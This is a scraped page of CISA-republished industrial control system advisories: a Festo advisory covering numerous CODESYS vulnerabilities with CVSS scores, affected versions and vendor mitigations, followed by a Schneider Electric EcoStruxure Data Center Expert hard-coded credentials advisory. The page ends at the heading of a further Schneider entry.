https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2023-37554 In multiple versions of multiple Codesys products, after successful authentication as a user, specific crafted network communication requests with inconsistent content can cause the CmpAppBP component to read internally from an invalid address, potentially leading to a denial-of-service condition. This vulnerability is different to CVE-2023-37552, CVE-2023-37553, CVE-2023-37555 and CVE-2023-37556. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed 
separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2023-37555 In multiple versions of multiple Codesys products, after successful authentication as a user, specific crafted network communication requests with inconsistent content can cause the CmpAppBP component to read internally from an invalid address, potentially leading to a denial-of-service condition. This vulnerability is different to CVE-2023-37552, CVE-2023-37553, CVE-2023-37554 and CVE-2023-37556. 
View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. 
https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2023-37556 In multiple versions of multiple Codesys products, after successful authentication as a user, specific crafted network communication requests with inconsistent content can cause the CmpAppBP component to read internally from an invalid address, potentially leading to a denial-of-service condition. This vulnerability is different to CVE-2023-37552, CVE-2023-37553, CVE-2023-37554 and CVE-2023-37555. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed 
separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2023-37557 After successful authentication as a user in multiple Codesys products in multiple versions, specific crafted remote communication requests can cause the CmpAppBP component to overwrite a heap-based buffer, which can lead to a denial-of-service condition. 
View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. 
https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-787 Out-of-bounds Write Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2023-37558 After successful authentication as a user in multiple Codesys products in multiple versions, specific crafted network communication requests with inconsistent content can cause the CmpAppForce component to read internally from an invalid address, potentially leading to a denial-of-service condition. This vulnerability is different to CVE-2023-37559 View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. 
To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2023-37559 After successful authentication as a user in multiple Codesys products in multiple versions, specific crafted network communication requests with inconsistent content can cause the CmpAppForce component to read internally from an invalid address, potentially leading to a denial-of-service condition. 
This vulnerability is different to CVE-2023-37558 View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. 
KG security advisory FSA-202601 (Several CODESYS vulnerabilities in Festo Automation Suite), CSAF: https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json
Mitigation: For more information see the associated Festo SE & Co. KG security advisory FSA-202601 (Several CODESYS vulnerabilities in Festo Automation Suite), HTML: https://certvde.com/en/advisories/VDE-2025-108
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS 3.1, base score 6.5 MEDIUM, vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

The affected-product list and the remediations below are identical for every CVE in this advisory and are therefore given once.

Affected Products
CODESYS in Festo Automation Suite. Vendor: FESTO, CODESYS. Product versions:
- FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*
- FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*
- FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*
- FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*
Product Status: known_affected

Remediations
FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:
Mitigation: Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate these vulnerabilities customers are advised to:
- Download the latest, patched version of Codesys directly from the official Codesys website.
- Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied.
- Regularly monitor Codesys security advisories and apply updates promptly.
- Keep the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.
Mitigation: The following product versions have been fixed: CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 is the fixed version for all CVEs.
Mitigation: For more information see the associated Festo SE & Co. KG security advisory FSA-202601 (Several CODESYS vulnerabilities in Festo Automation Suite), CSAF: https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json
Mitigation: For more information see the associated Festo SE & Co. KG security advisory FSA-202601 (Several CODESYS vulnerabilities in Festo Automation Suite), HTML: https://certvde.com/en/advisories/VDE-2025-108

Vulnerabilities

CVE-2023-3935: A heap buffer overflow vulnerability in the Wibu CodeMeter Runtime network service up to version 7.60b allows an unauthenticated, remote attacker to achieve RCE and gain full access to the host system.
Relevant CWE: CWE-787 Out-of-bounds Write
Metrics: CVSS 3.1, base score 9.8 CRITICAL, vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2023-49675: An unauthenticated local attacker may trick a user into opening corrupted project files to execute arbitrary code or crash the system due to an out-of-bounds write vulnerability.
Relevant CWE: CWE-787 Out-of-bounds Write
Metrics: CVSS 3.1, base score 7.8 HIGH, vector CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2023-49676: An unauthenticated local attacker may trick a user into opening corrupted project files to crash the system due to a use-after-free vulnerability.
Relevant CWE: CWE-416 Use After Free
Metrics: CVSS 3.1, base score 5.5 MEDIUM, vector CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

CVE-2023-6357: A low-privileged remote attacker could exploit the vulnerability and inject additional system commands via file system libraries, which could give the attacker full control of the device.
Relevant CWE: CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Metrics: CVSS 3.1, base score 8.8 HIGH, vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2024-5000: An unauthenticated remote attacker can use a malicious OPC UA client to send a crafted request to affected CODESYS products, which can cause a DoS due to incorrect calculation of buffer size.
Relevant CWE: CWE-13 ASP.NET Misconfiguration: Password in Configuration File
Metrics: CVSS 3.1, base score 7.5 HIGH, vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2024-8175: An unauthenticated remote attacker can cause the CODESYS web server to access invalid memory, which results in a DoS.
Relevant CWE: CWE-754 Improper Check for Unusual or Exceptional Conditions
Metrics: CVSS 3.1, base score 7.5 HIGH, vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2025-0694: Insufficient path validation in CODESYS Control allows low-privileged attackers with physical access to gain full filesystem access.
Relevant CWE: CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Metrics: CVSS 3.1, base score 6.6 MEDIUM, vector CVSS:3.1/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2025-1468: An unauthenticated remote attacker can gain access to sensitive information, including authentication information, when using CODESYS OPC UA Server with the non-default Basic128Rsa15 security policy.
Relevant CWE: CWE-203 Observable Discrepancy
Metrics: CVSS 3.1, base score 7.5 HIGH, vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVE-2025-41658: CODESYS Runtime Toolkit-based products may expose sensitive files to local low-privileged operating system users due to default file permissions.
Relevant CWE: CWE-276 Incorrect Default Permissions
Metrics: CVSS 3.1, base score 5.5 MEDIUM, vector CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

CVE-2025-41659: A low-privileged attacker can remotely access the PKI folder of the CODESYS Control runtime system and thus read and write certificates and their keys. This allows sensitive data to be extracted or certificates to be accepted as trusted. Although all services remain available, only unencrypted communication is possible if the certificates are deleted.
Relevant CWE: CWE-732 Incorrect Permission Assignment for Critical Resource
Metrics: CVSS 3.1, base score 8.3 HIGH, vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L

CVE-2020-11023: In jQuery versions greater than or equal to 1.0.3 and before 3.5.0, passing HTML containing option elements from untrusted sources, even after sanitizing it, to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0.
Relevant CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Metrics: CVSS 3.1, base score 6.9 MEDIUM, vector CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:N

CVE-2022-47382: An authenticated remote attacker may use a stack-based out-of-bounds write vulnerability in the CmpTraceMgr component of multiple CODESYS products in multiple versions to write data into the stack, which can lead to a denial-of-service condition, memory overwriting, or remote code execution.
Relevant CWE: CWE-787 Out-of-bounds Write
Metrics: CVSS 3.1, base score 8.8 HIGH, vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Acknowledgments
CERT@VDE reported this vulnerability to Festo.

Legal Notice and Terms of Use
This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices
CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities, such as:
- Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet.
- Locate control system networks and remote devices behind firewalls and isolate them from business networks.
- When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs). Recognize that VPNs may have vulnerabilities, should be updated to the most recent version available, and are only as secure as the connected devices.
CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.
Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.
CISA also recommends users take the following measures to protect themselves from social engineering attacks:
- Do not click web links or open attachments in unsolicited email messages.
- Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.
- Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.
No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time.

Revision History
Initial Release Date: 2026-03-17
2026-03-17, revision 1: Initial Republication of Festo SE & Co. KG FSA-202601

Schneider Electric EcoStruxure Data Center Expert
Governance & Regulation | CISA Advisories | 12 days ago

Summary
Schneider Electric is aware of a hard-coded credentials vulnerability in its EcoStruxure IT Data Center Expert (DCE) product that requires administrator credentials and enabling a feature (SOCKS Proxy) that is off by default. The EcoStruxure IT Data Center Expert product is scalable monitoring software that collects, organizes, and distributes critical device information, providing a comprehensive view of equipment. Failure to apply the remediation provided below may risk information disclosure and remote compromise of the product, which could result in disruption of operations and access to system data.

The following versions of Schneider Electric EcoStruxure Data Center Expert are affected:
• EcoStruxure IT Data Center Expert vers:intdot/<=9.0
• EcoStruxure IT Data Center Expert 9.1

CVSS v3: 7.2 | Vendor: Schneider Electric | Equipment: Schneider Electric EcoStruxure Data Center Expert | Vulnerabilities: Use of Hard-coded Credentials

Background
Critical Infrastructure Sectors: Commercial Facilities, Energy, Food and Agriculture, Government Services and Facilities, Transportation Systems
Countries/Areas Deployed: Worldwide
Company Headquarters Location: France

Vulnerabilities
CVE-2025-13957
A hard-coded credentials vulnerability exists that could lead to information disclosure and remote code execution when SOCKS Proxy is enabled, and administrator credentials and PostgreSQL database credentials are known. SOCKS Proxy is disabled by default.
Affected Products: Schneider Electric EcoStruxure Data Center Expert
Vendor: Schneider Electric
Product Version: EcoStruxure IT Data Center Expert (formerly known as StruxureWare Data Center Expert) v9.0 and prior
Product Status: fixed, known_affected
Remediations
Vendor fix: v9.1 of EcoStruxure IT Data Center Expert includes a fix for this vulnerability and is available for download here: https://www.se.com/en/product-range/61851-ecostruxure-it-data-center-expert/#software-and-firmware
Mitigation: If users choose not to apply the remediation provided above, they should immediately apply the following mitigations to reduce the risk of exploit:
• Harden the DCE instance according to the cybersecurity best practices documented in the EcoStruxure IT Data Center Expert Security Handbook.
• Ensure the SOCKS Proxy is disabled, as in the default configuration.
Mitigation: For more information see the associated Schneider Electric CPCERT security advisory SEVD-2026-069-05, Use of Hard-coded Credentials vulnerability in EcoStruxure IT Data Center Expert (PDF version: https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2026-069-05&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2026-069-05.pdf; CSAF version: https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2026-069-05&p_enDocType=Security+and+Safety+Notice&p_File_Name=sevd-2026-069-05.json).
Relevant CWE: CWE-798 Use of Hard-coded Credentials
Metrics: CVSS v3.1 base score 7.2 (HIGH), vector string CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Acknowledgments
Hassan Ali of TrendAI Zero Day Initiative reported this vulnerability to Schneider Electric.

General Security Recommendations
Schneider Electric strongly recommends the following industry cybersecurity best practices:
* Locate control and safety system networks and remote devices behind firewalls and isolate them from the business network.
* Install physical controls so no unauthorized personnel can access your industrial control and safety systems, components, peripheral equipment, and networks.
* Place all controllers in locked cabinets and never leave them in the “Program” mode.
* Never connect programming software to any network other than the network intended for that device.
* Scan all methods of mobile data exchange with the isolated network such as CDs, USB drives, etc. before use in the terminals or any node connected to these networks.
* Never allow mobile devices that have connected to any other network besides the intended network to connect to the safety or control networks without proper sanitation.
* Minimize network exposure for all control system devices and systems and ensure that they are not accessible from the Internet.
* When remote access is required, use secure methods, such as Virtual Private Networks (VPNs). Recognize that VPNs may have vulnerabilities and should be updated to the most current version available. Also, understand that VPNs are only as secure as the connected devices.
For more information refer to the Schneider Electric [Recommended Cybersecurity Best Practices](https://www.se.com/us/en/download/document/7EN52-0390/) document.

For More Information
This document provides an overview of the identified vulnerability or vulnerabilities and actions required to mitigate them. For more details and assistance on how to protect your installation, contact your local Schneider Electric representative or Schneider Electric Industrial Cybersecurity Services: https://www.se.com/ww/en/work/solutions/cybersecurity/. These organizations will be fully aware of this situation and can support you through the process.
For further information related to cybersecurity in Schneider Electric’s products, visit the company’s cybersecurity support portal page: https://www.se.com/ww/en/work/support/cybersecurity/overview.jsp

LEGAL DISCLAIMER
THIS NOTIFICATION DOCUMENT, THE INFORMATION CONTAINED HEREIN, AND ANY MATERIALS LINKED FROM IT (COLLECTIVELY, THIS “NOTIFICATION”) ARE INTENDED TO HELP PROVIDE AN OVERVIEW OF THE IDENTIFIED SITUATION AND SUGGESTED MITIGATION ACTIONS, REMEDIATION, FIX, AND/OR GENERAL SECURITY RECOMMENDATIONS AND IS PROVIDED ON AN “AS-IS” BASIS WITHOUT WARRANTY OR GUARANTEE OF ANY KIND. SCHNEIDER ELECTRIC DISCLAIMS ALL WARRANTIES RELATING TO THIS NOTIFICATION, EITHER EXPRESS OR IMPLIED, INCLUDING WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE. SCHNEIDER ELECTRIC MAKES NO WARRANTY THAT THE NOTIFICATION WILL RESOLVE THE IDENTIFIED SITUATION. IN NO EVENT SHALL SCHNEIDER ELECTRIC BE LIABLE FOR ANY DAMAGES OR LOSSES WHATSOEVER IN CONNECTION WITH THIS NOTIFICATION, INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF SCHNEIDER ELECTRIC HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. YOUR USE OF THIS NOTIFICATION IS AT YOUR OWN RISK, AND YOU ARE SOLELY LIABLE FOR ANY DAMAGES TO YOUR SYSTEMS OR ASSETS OR OTHER LOSSES THAT MAY RESULT FROM YOUR USE OF THIS NOTIFICATION. SCHNEIDER ELECTRIC RESERVES THE RIGHT TO UPDATE OR CHANGE THIS NOTIFICATION AT ANY TIME AND IN ITS SOLE DISCRETION.

About Schneider Electric
Schneider's purpose is to create Impact by empowering all to make the most of our energy and resources, bridging progress and sustainability for all. We call this Life Is On. Our mission is to be the trusted partner in Sustainability and Efficiency. We are a global industrial technology leader bringing world-leading expertise in electrification, automation and digitization to smart industries, resilient infrastructure, future-proof data centers, intelligent buildings, and intuitive homes. Anchored by our deep domain expertise, we provide integrated end-to-end lifecycle AI-enabled Industrial IoT solutions with connected products, automation, software and services, delivering digital twins to enable profitable growth for our customers. We are a people company with an ecosystem of 150,000 colleagues and more than a million partners operating in over 100 countries to ensure proximity to our customers and stakeholders. We embrace diversity and inclusion in everything we do, guided by our meaningful purpose of a sustainable future for all. www.se.com

Legal Notice and Terms of Use
This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices
CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities.
• Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet.
• Locate control system networks and remote devices behind firewalls and isolate them from business networks.
• When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize that a VPN is only as secure as its connected devices.
CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.
Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

Advisory Conversion Disclaimer
This ICSA is a verbatim republication of Schneider Electric CPCERT SEVD-2026-069-05 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Schneider Electric CPCERT directly for any questions regarding this advisory.

Revision History
Initial Release Date: 2026-03-10
• 2026-03-10, revision 1: Original Release
• 2026-03-17, revision 2: Initial CISA Republication of Schneider Electric SEVD-2026-069-05 advisory

Schneider Electric SCADAPack and RemoteConnect
Governance & Regulation | CISA Advisories | 12 days ago

Summary
